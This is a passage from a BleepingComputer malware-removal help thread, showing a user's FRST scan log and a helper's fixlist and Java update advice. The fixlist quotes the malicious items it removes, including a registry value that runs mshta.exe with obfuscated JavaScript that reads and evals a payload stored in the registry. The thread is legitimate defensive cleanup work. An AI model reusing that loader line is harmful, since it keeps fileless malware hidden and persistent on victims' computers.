R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-03-30] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7183632 2016-07-18] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-06-29] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-06-29] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108304 2016-06-29] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-06-29] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-06-29] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-06-29] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [473592 2016-07-13] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [162904 2016-06-29] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [292704 2016-08-05] (AVAST Software)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-06-26] (GFI Software)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-07-27] (Malwarebytes)
S3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
R3 SmbDrv; C:\Windows\system32\DRIVERS\Smb_driver.sys [20016 2011-10-14] (Synaptics Incorporated)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-08-06] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-08 10:49 - 2016-08-08 10:50 - 00028095 _____ C:\Users\Greg\Desktop\FRST.txt
2016-08-08 10:39 - 2016-08-08 10:49 - 00000000 ____D C:\FRST
2016-08-08 08:51 - 2016-08-08 10:39 - 02393600 _____ (Farbar) C:\Users\Greg\Desktop\FRST64.exe
2016-08-08 07:23 - 2016-08-08 07:34 - 00000000 ____D C:\Users\Greg\Documents\8-8-2016
2016-08-06 18:09 - 2016-08-06 18:09 - 00002872 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-08-06 18:09 - 2016-08-06 18:09 - 00000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-08-06 18:09 - 2016-08-06 18:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-08-06 18:09 - 2016-08-06 18:09 - 00000000 ____D C:\Program Files\CCleaner
2016-08-06 14:21 - 2016-08-06 17:43 - 00000000 ____D C:\AdwCleaner
2016-08-06 14:20 - 2016-08-06 14:21 - 03712064 _____ C:\Users\Greg\Downloads\adwcleaner_5.201.exe
2016-08-06 12:48 - 2016-08-06 18:09 - 08136664 _____ (Piriform Ltd) C:\Users\Greg\Downloads\ccsetup520.exe
2016-08-06 12:48 - 2016-08-06 12:48 - 08136664 _____ (Piriform Ltd) C:\Users\Greg\Downloads\ccsetup520 (1).exe
2016-08-06 08:34 - 2016-08-06 08:34 - 00000000 ____D C:\Users\Greg\Downloads\backups
2016-08-06 08:25 - 2016-08-06 08:25 - 00015882 _____ C:\Users\Greg\Downloads\hijackthis after hitman
2016-08-06 08:10 - 2016-08-06 08:10 - 00004498 _____ C:\WINDOWS\system32\.crusader
2016-08-06 07:46 - 2016-08-06 08:11 - 00000000 ____D C:\ProgramData\HitmanPro
2016-08-05 10:37 - 2016-08-06 07:46 - 11438608 _____ (SurfRight B.V.) C:\Users\Greg\Downloads\hitmanpro_x64.exe
2016-08-05 09:37 - 2016-08-06 20:07 - 00000000 ____D C:\Users\Greg\AppData\Local\CrashDumps
2016-08-05 09:12 - 2016-08-05 09:12 - 00007330 _____ C:\Users\Greg\Downloads\Rouge Killer 1st scan.txt
2016-08-05 08:11 - 2016-08-06 12:46 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2016-08-05 08:09 - 2016-08-05 08:09 - 25356360 _____ C:\Users\Greg\Downloads\RogueKillerX64.exe
2016-08-05 08:09 - 2016-08-05 08:09 - 00000000 ____D C:\ProgramData\RogueKiller
2016-08-04 11:34 - 2016-08-04 11:34 - 00000000 ____D C:\Users\Greg Main Acct\Documents\ProcAlyzer Dumps
2016-08-04 09:18 - 2016-08-04 09:18 - 00000000 ____D C:\Program Files\Common Files\AV
2016-08-04 09:18 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-08-04 09:06 - 2016-08-04 11:32 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-08-04 09:06 - 2016-08-04 09:30 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-08-04 09:06 - 2016-08-04 09:06 - 00001460 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-08-04 09:06 - 2016-08-04 09:06 - 00001448 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-08-04 09:06 - 2016-08-04 09:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-08-04 09:06 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\WINDOWS\system32\sdnclean64.exe
2016-08-04 09:03 - 2016-08-04 09:03 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Greg\Downloads\spybot-2.4.exe
2016-08-04 08:42 - 2016-08-04 08:42 - 00388608 _____ (Trend Micro Inc.) C:\Users\Greg\Downloads\HijackThis.exe
2016-08-03 11:17 - 2016-08-03 11:17 - 00001994 _____ C:\Users\Greg Main Acct\Desktop\JRT.txt
2016-08-03 11:04 - 2016-08-03 11:05 - 105268120 _____ (Hewlett-Packard ) C:\Users\Greg\Downloads\sp50701.exe
2016-08-03 03:07 - 2016-08-03 03:07 - 00001963 _____ C:\Users\Public\Desktop\Garmin Express.lnk
2016-08-03 03:07 - 2016-08-03 03:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-07-31 01:09 - 2016-08-02 09:02 - 00000000 _____ C:\WINDOWS\SysWOW64\last.dump
2016-07-28 16:05 - 2016-07-28 16:05 - 01940430 ____N C:\Users\Greg\Documents\Scan0041.pdf
2016-07-28 16:03 - 2016-07-28 16:03 - 00745150 ____N C:\Users\Greg\Documents\Scan0040.pdf
2016-07-28 16:00 - 2016-07-28 16:00 - 01196295 ____N C:\Users\Greg\Documents\Scan0039.pdf
2016-07-27 16:06 - 2016-07-27 16:07 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-07-27 16:06 - 2016-07-27 16:06 - 00001171 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-07-27 16:06 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-07-27 16:06 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-07-27 16:06 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-07-27 16:04 - 2016-07-27 16:05 - 22851472 _____ (Malwarebytes ) C:\Users\Greg\Downloads\mbam-setup-2.2.1.1043.exe
2016-07-25 16:43 - 2016-07-27 15:53 - 00000000 ____D C:\Users\Greg Main Acct\AppData\Local\ElevatedDiagnostics
2016-07-25 15:03 - 2016-06-29 13:38 - 00390984 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2016-07-24 17:12 - 2016-07-27 17:29 - 00000000 ____D C:\Users\Greg\Documents\Sound recordings
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Roaming\Macromedia
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Roaming\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Local\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Macromedia
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Local\Adobe
2016-07-15 11:27 - 2016-08-06 18:19 - 00000000 ____D C:\Users\Greg\AppData\Local\a82409
2016-07-15 11:27 - 2016-07-15 11:27 - 00000000 ____D C:\Users\Greg\AppData\Roaming\f08b1d
2016-07-13 11:12 - 2016-07-13 11:12 - 06079168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-08 10:48 - 2010-12-07 11:03 - 00000000 ____D C:\Users\Greg\AppData\Roaming\Skype
2016-08-08 10:21 - 2015-06-15 17:54 - 00000572 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-56867686-1103405722-4171089578-1000.job
2016-08-08 10:12 - 2012-04-21 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-08-08 10:07 - 2015-05-17 09:57 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-08 09:32 - 2015-06-15 17:59 - 00000668 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-56867686-1103405722-4171089578-1000.job
2016-08-08 08:34 - 2010-12-07 15:09 - 00000000 ____D C:\Users\Greg\AppData\Roaming\ArcSoft
2016-08-08 07:51 - 2016-02-06 16:41 - 00000000 ____D C:\Users\Greg
2016-08-08 07:22 - 2016-02-06 16:40 - 01009756 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-08-08 07:22 - 2015-10-30 03:21 - 00000000 ____D C:\WINDOWS\INF
2016-08-08 06:31 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-08-08 01:00 - 2015-02-06 23:30 - 00000394 ____H C:\WINDOWS\Tasks\{C2878297-853F-44A9-9F89-629C6496C233}.job
2016-08-07 18:13 - 2015-10-30 03:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-08-07 17:07 - 2012-11-11 13:56 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-07 15:26 - 2015-07-30 09:44 - 00003228 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForGreg
2016-08-07 15:26 - 2015-07-30 09:44 - 00000344 _____ C:\WINDOWS\Tasks\HPCeeScheduleForGreg.job
2016-08-07 01:00 - 2015-02-06 23:31 - 00000394 ____H C:\WINDOWS\Tasks\{F42C3EB7-610F-4853-9D19-614BCECFC75C}.job
2016-08-06 18:19 - 2014-02-05 13:19 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-08-06 18:16 - 2016-02-06 17:05 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-08-06 18:15 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-08-06 11:57 - 2010-12-07 11:03 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-08-06 11:57 - 2010-07-15 16:44 - 00000000 ____D C:\ProgramData\Skype
2016-08-06 07:46 - 2016-02-06 20:04 - 00000000 ____D C:\Users\Greg Main Acct
2016-08-06 05:35 - 2015-10-30 03:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-08-05 09:25 - 2016-02-07 11:16 - 00292704 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswvmm.sys
2016-08-04 12:33 - 2016-02-07 11:30 - 00000000 ____D C:\Users\DefaultAppPool
2016-08-04 10:12 - 2016-06-09 15:41 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-08-03 18:19 - 2015-02-07 12:53 - 00000000 ____D C:\Users\Greg\AppData\Roaming\vlc
2016-08-03 11:07 - 2010-11-03 01:40 - 00000000 ___HD C:\Program Files (x86)\Temp
2016-08-03 03:08 - 2015-06-22 17:10 - 00000000 ____D C:\ProgramData\Package Cache
2016-08-03 03:07 - 2015-06-22 17:12 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-08-03 03:07 - 2015-06-22 17:11 - 00003624 _____ C:\WINDOWS\System32\Tasks\GarminUpdaterTask
2016-08-02 16:20 - 2016-02-06 16:38 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-08-01 15:39 - 2010-12-07 15:38 - 00000000 ____D C:\Users\Greg\AppData\Roaming\HpUpdate
2016-08-01 13:48 - 2016-03-01 13:08 - 00000000 ____D C:\Users\Greg\Documents\MasterCard & Visa Assessments Oct 2
2016-07-28 17:02 - 2015-05-17 09:57 - 00003980 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-07-28 17:02 - 2015-05-17 09:56 - 00003748 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-07-28 16:15 - 2010-12-07 12:42 - 00000000 ____D C:\Users\Greg\Documents\Clover Valley
2016-07-28 10:26 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-07-28 10:13 - 2016-02-07 11:16 - 00004278 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-07-27 17:59 - 2010-12-07 12:42 - 00000000 ____D C:\Users\Greg\Documents\Clover Valley Proposal
2016-07-26 15:43 - 2016-02-07 11:34 - 00001040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-07-26 15:43 - 2016-02-07 11:34 - 00001028 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-07-25 15:05 - 2016-03-22 18:21 - 00004004 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1458685296
2016-07-25 15:05 - 2016-03-22 18:21 - 00001082 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-07-25 15:05 - 2016-02-07 11:20 - 00001979 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast Free Antivirus.lnk
2016-07-25 15:05 - 2016-02-07 11:20 - 00001967 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-07-25 14:56 - 2016-01-11 14:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-07-25 14:56 - 2015-10-30 05:07 - 00000000 ____D C:\WINDOWS\ShellNew
2016-07-25 14:56 - 2015-10-30 05:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 __RSD C:\WINDOWS\Media
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\setup
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\icsxml
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\Provisioning
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\L2Schemas
2016-07-25 14:56 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-07-25 14:56 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-07-25 14:41 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\registration
2016-07-19 09:48 - 2016-05-05 13:05 - 00000000 ____D C:\Users\Greg\AppData\Local\MicrosoftEdge
2016-07-19 09:20 - 2015-02-07 12:52 - 00000958 _____ C:\Users\Public\Desktop\VLC media player.lnk
2016-07-19 08:55 - 2010-07-15 16:45 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-07-16 11:16 - 2015-05-28 18:20 - 00000000 ____D C:\Users\Greg\Documents\Letters and Thought
2016-07-14 14:50 - 2015-01-03 17:17 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-07-13 16:23 - 2016-02-07 11:16 - 00473592 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2016-07-13 13:11 - 2013-08-19 09:19 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-07-13 12:55 - 2011-12-20 10:21 - 144749672 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-07-13 11:12 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-07-13 11:12 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-07-12 08:32 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI(53)

==================== Files in the root of some directories =======

2013-02-06 14:48 - 2013-02-06 14:48 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-12-07 11:04 - 2010-12-07 11:04 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2010-12-07 15:34 - 2016-02-07 10:55 - 0002760 _____ () C:\ProgramData\hpzinstall.log
2010-11-03 01:47 - 2010-11-03 01:47 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-15 17:11 - 2010-07-15 17:12 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-15 17:07 - 2010-07-15 17:07 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-15 17:06 - 2010-07-15 17:06 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-15 17:07 - 2010-07-15 17:11 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-11-03 01:47 - 2010-11-03 01:47 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Files to move or delete:
====================
C:\Windows\Tasks\{C2878297-853F-44A9-9F89-629C6496C233}.job
C:\Windows\Tasks\{F42C3EB7-610F-4853-9D19-614BCECFC75C}.job

Some files in TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\jre-8u101-windows-au.exe
C:\Users\Greg\AppData\Local\Temp\jre-8u91-windows-au.exe
C:\Users\Greg\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Greg Main Acct\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-05 09:41

==================== End of FRST.txt ============================

 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 09 August 2016 - 09:50 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [**cfdcc<*>] => "C:\Users\Greg\AppData\Local\a82409\63a99d.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk [2016-08-06]
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk [2016-08-06]
ShortcutTarget: df1157.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts-x32: Restriction <======= ATTENTION
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg_igeared.xml [2011-05-30]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
CHR Extension: (Avast Online Security) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-05]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
C:\Users\Greg\AppData\Local\a82409
C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk
C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk
Task: {2CD25754-13AA-4775-B30F-F0607745C1F6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {51C1E536-747F-4B34-840F-D0914E0355F5} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5B16E285-B289-421B-99E7-A12B163EE510} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5D3F78A7-82CA-4FAD-90E0-89D7AC31A69C} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {6A7B26ED-20DF-4D37-B1DD-5BE116E84B90} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {76A4380F-3D18-49F7-91FA-E28BA06D8AE8} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {928CFA40-274E-4744-AE9D-B6368CD25CFF} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {D1D0EB61-0014-47B5-8382-2F0E44CF7A8E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D1E3F3E1-731E-45E4-86AD-ABAF3DAAA5F9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E499F8F0-A04A-47B8-8BAC-E498442C0399} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E94FE054-1715-4313-8BF0-E7CD02F28C77} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {EF109252-8D17-40B7-9D01-75B7341DA22A} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F3502C3B-DF07-4A3F-A123-D2D20CF4E814} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {F76C1D00-C776-4D7F-9828-7B4ADC39D3EB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Classes\b60943: "C:\WINDOWS\system32\mshta.exe" "javascript:JpF0uO8C="1Z";JY2=new ActiveXObject("WScript.Shell");HRZ4b8P="6";M7Hm0H=JY2.RegRead("HKCU\\software\\isikjeeris\\xiyj");yej7u0l="MobpLa44";eval(M7Hm0H);hXOb3M8Tz="lnlLm";" <===== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Java 8 Update 91 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418091F0}) (Version: 8.0.910.15 - Oracle Corporation)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)

===

Please post the log and let me know what problem persists with this computer.

#3 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 09 August 2016 - 11:43 AM

Nasdaq,

 

First thanks for the help.

 

